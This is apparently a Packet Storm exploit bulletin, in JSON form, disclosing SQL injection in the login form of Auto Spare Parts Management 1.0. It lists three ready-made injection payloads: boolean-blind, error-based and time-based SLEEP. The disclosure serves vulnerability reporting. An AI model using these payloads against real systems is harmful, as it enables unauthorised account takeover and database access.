Auto Spare Parts Management 1.0 SQL Injection

2022-02-21T00:00:00

Description

{"id": "PACKETSTORM:166067", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Auto Spare Parts Management 1.0 SQL Injection", "description": "", "published": "2022-02-21T00:00:00", "modified": "2022-02-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166067/Auto-Spare-Parts-Management-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-21T16:07:25", "viewCount": 45, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "vulnersScore": 1.2}, "_state": {"dependencies": 1646199919}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166067/aspm10-sql.txt", "sourceData": "`## Title: Auto-Spare-Parts-Management v1.0 remote SQL-Injections \n## Author: nu11secur1ty \n## Date: 02.19.2022 \n## Vendor: https://github.com/pavanpatil45 \n## Software: https://github.com/pavanpatil45/Auto-Spare-Parts-Management \n \n \n## Description: \nThe Referer HTTP header on Auto-Spare-Parts-Management v1.0 system \nappears to be vulnerable to SQL injection attacks, parameter `user`. \nThe payload ' was submitted in the Referer HTTP header, and a database \nerror message was returned. \nThe attacker from outside can take control of all accounts of this \nsystem by using this vulnerability! \nWARNING: If this is in some external domain, or some subdomain, or \ninternal, this will be extremely dangerous! \nStatus: CRITICAL \n \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: user (POST) \nType: boolean-based blind \nTitle: AND boolean-based blind - WHERE or HAVING clause \nPayload: user=admin1' AND 5432=5432 AND \n'MXPx'='MXPx&password=admin1&btnlogin= \n \nType: error-based \nTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or \nGROUP BY clause (FLOOR) \nPayload: user=admin1' AND (SELECT 8861 FROM(SELECT \nCOUNT(*),CONCAT(0x71786b6271,(SELECT \n(ELT(8861=8861,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND \n'aOSP'='aOSP&password=admin1&btnlogin= \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: user=admin1' AND (SELECT 1749 FROM \n(SELECT(SLEEP(3)))XjEM) AND 'xoHI'='xoHI&password=admin1&btnlogin= \n--- \n \n``` \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/pavanpatil45/Auto-Spare-Parts-Management) \n \n## Proof and Exploit: \n[href](https://streamable.com/qq19po) \n \n \n`\n"}